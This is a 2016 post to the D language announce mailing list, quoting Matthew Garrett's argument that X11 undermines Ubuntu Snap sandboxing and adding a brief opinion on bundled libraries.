XDG-APP and D

Anonymouse via Digitalmars-d-announce digitalmars-d-announce at puremagic.com
Sat Apr 23 08:13:15 PDT 2016 

On Saturday, 23 April 2016 at 13:56:45 UTC, Joseph Rushton 
Wakeling wrote:
> On Saturday, 23 April 2016 at 11:29:29 UTC, NX wrote:
>> I will just leave it here:
>>
>> http://www.zdnet.com/article/linux-expert-matthew-garrett-ubuntu-16-04s-new-snap-format-is-a-security-risk/
>
> This is FUD.
>
> There are no security risks with snappy packages that there 
> aren't with any other existing Linux packaging systems.

But that's more or less what he's saying though, if you read his 
original blog post. His gripe isn't that it's defect 
security-wise, but rather that it's being marketed as capital-s 
Safe. As long as programs run under the X protocol, everything is 
up for grabs. Snappy doesn't change that fact at all, so widely 
claiming it makes it impossible to steal data would be 
cherry-picking Mir behaviour.


"Snaps are intended to make it easier to distribute applications 
for Ubuntu - they include their dependencies rather than relying 
on the archive, they can be updated on a schedule that's separate 
from the distribution itself and they're confined by a strong 
security policy that makes it impossible for an app to steal your 
data.

At least, that's what Canonical assert. It's true in a sense - if 
you're using Snap packages on Mir (ie, Ubuntu mobile) then 
there's a genuine improvement in security. But if you're using 
X11 (ie, Ubuntu desktop) it's horribly, awfully misleading. Any 
Snap package you install is completely capable of copying all 
your private data to wherever it wants with very little 
difficulty.

The problem here is the X11 windowing system. X has no real 
concept of different levels of application trust. Any application 
can register to receive keystrokes from any other application. 
Any application can inject fake key events into the input stream. 
An application that is otherwise confined by strong security 
policies can simply type into another window. An application that 
has no access to any of your private data can wait until your 
session is idle, open an unconfined terminal and then use curl to 
send your data to a remote site. As long as Ubuntu desktop still 
uses X11, the Snap format provides you with very little 
meaningful security. Mir and Wayland both fix this, which is why 
Wayland is a prerequisite for the sandboxed xdg-app design."


Sandboxing is good but I'm not convinced shipping duplicates of 
libraries with each program is. Packages were meant to solve this 
and they do, though .so version conflicts is a thing (albeit a 
rare one).

More information about the Digitalmars-d-announce mailing list